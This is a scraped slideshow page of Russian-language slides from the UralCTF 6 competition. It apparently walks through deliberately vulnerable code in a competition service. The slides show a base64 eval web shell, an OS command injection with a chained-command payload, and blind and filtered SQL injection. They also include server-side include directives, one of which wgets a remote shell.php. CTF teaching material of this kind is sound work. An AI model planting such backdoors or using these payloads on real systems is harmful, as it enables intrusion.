Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

1f5694b92ab2c96e2038b33a8b0ceb7d

189 views

Published on

  • Be the first to comment

1f5694b92ab2c96e2038b33a8b0ceb7d

  1. 1. Отдел кадров Самый простой сервис UralCTF 6
  2. 2. Стандартные пароли <ul><li>Меняйте все пароли, какие только возможно сменить! </li></ul><ul><li>Кроме того, хорошо бы удалить не нужные файлы, например phpinfo.php </li></ul>
  3. 3. Старый шелл код <ul><li>mysql.php: </li></ul><ul><li>@$_GET[‘code’]&& </li></ul><ul><li>eval(base64_decode($_GET[‘code’])); </li></ul><ul><li>print_r(mysql_fetch_array(mysql_query(…))) </li></ul>
  4. 4. Инъекция ОС <ul><li>index.php: </li></ul><ul><li>$act=@$_GET['act']; </li></ul><ul><li>if(!$act)$act='index'; </li></ul><ul><li>eval(`type {$act}.inc`); </li></ul><ul><li>?act=add.inc && echo+ ” phpinfo() ”&& cat+add </li></ul>
  5. 5. Слепая SQL инъекция <ul><li>$ip= </li></ul><ul><li>@$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? </li></ul><ul><li>$_SERVER[' HTTP_ X_FORWARDED_FOR']: </li></ul><ul><li>$_SERVER['REMOTE_ADDR']; </li></ul><ul><li>INSERT INTO `log` (url,ip,time) </li></ul><ul><li>VALUES ('{$url}','{$ip}',NOW()) </li></ul>
  6. 6. SQL инъекция <ul><li>show.inc: </li></ul><ul><li>$sort=preg_replace('/UNION|SELECT| -- | |/*(.*)*//i','',$sort,E_STRICT); </li></ul><ul><li>$sql=&quot;HANDLER $mysql_table READ id $sort WHERE flag='' LIMIT 1&quot;; </li></ul>
  7. 7. SSI <ul><li>LoadModule include_module modules/mod_include.so </li></ul><ul><li>Options +Includes </li></ul><ul><li>AddOutputFilter INCLUDES .php </li></ul><ul><li><!--#exec cmd=&quot;ls - la &quot; --> </li></ul><ul><li><!--#exec cmd=“ wget http://.../shell.php &quot; --> </li></ul>
  8. 8. ??? <ul><li>//if($info['flag'])echo '<span style=&quot;display:none;)&quot;>'.$info['flag'].'</span>'; </li></ul><ul><li>$sort='LAST'; </li></ul><ul><li>// eval(`type {$act}.inc`); </li></ul>
  9. 9. Ваши вопросы? Совсем нету?

×